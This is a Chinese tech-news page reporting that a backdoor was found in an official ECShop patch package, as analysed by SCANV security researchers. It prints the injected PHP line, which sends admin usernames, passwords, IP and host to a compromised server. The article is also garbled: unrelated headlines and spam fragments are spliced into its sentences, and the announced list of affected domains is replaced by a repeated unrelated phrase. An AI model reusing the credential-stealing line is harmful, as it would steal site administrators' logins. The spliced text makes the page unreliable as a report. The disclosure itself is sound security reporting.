科技网

当前位置: 首页 >新闻

开源网店ECShop又见后门补钉程序再遭

新闻
来源: 作者: 2019-05-17 01:41:37

给女儿的一封信
w.kqyqo.com/klnntigl/109865.html" target="_blank">全面屏之后路在何方1数科技虚拟屏里讲故事
7月份想换手机的再等等这几款手机行将发布
苹果发布OSX1092更新修复SSL漏洞

2013年5月,SCANV站安全中心曾经响应过ECShop店程序的后门事件,本以为此事已了,不料在近日,又有安全研究人员在漏洞平台Wooyun上发现了ECShop官方补钉的后门代码。

经SCANV站安全研究人员分析发现,这一次的后门代码存在于一阿迪近一年股票暴涨130% 销售额与净利润均高增长
个编号为273utf8_patch006的历史补丁文件包中。骇客将补丁包里的(\admin\p)文件篡改后,插入了一段记录后台用户及密码等信息的代码,并发送到一个由黑客控制的服务器上。值得注意的是,SCANV安全研究人员在分析前两次补丁后门代码里并没有发现本次的后门代码,因此,本次后门事件可能发生在前两次篡改之前。

本次骇客植入的后门代码:

文件\admin\p代码行:

@file_get_contents( http://[马赛克]/api/manyou/ECShop/p?username= .$_POST[ username ]. password= .$_POST[ password ]. --- .$_SERVER[ REMOTE_ADDR ]. --- .date( Y-m-d|H:i:s ). --- .$_SERVER[ HTTP_HOST ].$_SERVER[ PHP_SELF

通过进一步分析发现 http://[马赛克]/ 站实际是被黑客入侵控制的站( 肉鸡 ),而且黑客用来搜集密码等信息的文件永恒的龙潭大峡谷 演绎凄美生死恋
目录还可以 历遍文件 ,如图:

经过SCANV站安全研究人员的下载并去重,发现大概有90个域名站受影响。列表如下:

小孩风寒感冒
小孩风寒感冒
小孩风寒感冒

相关推荐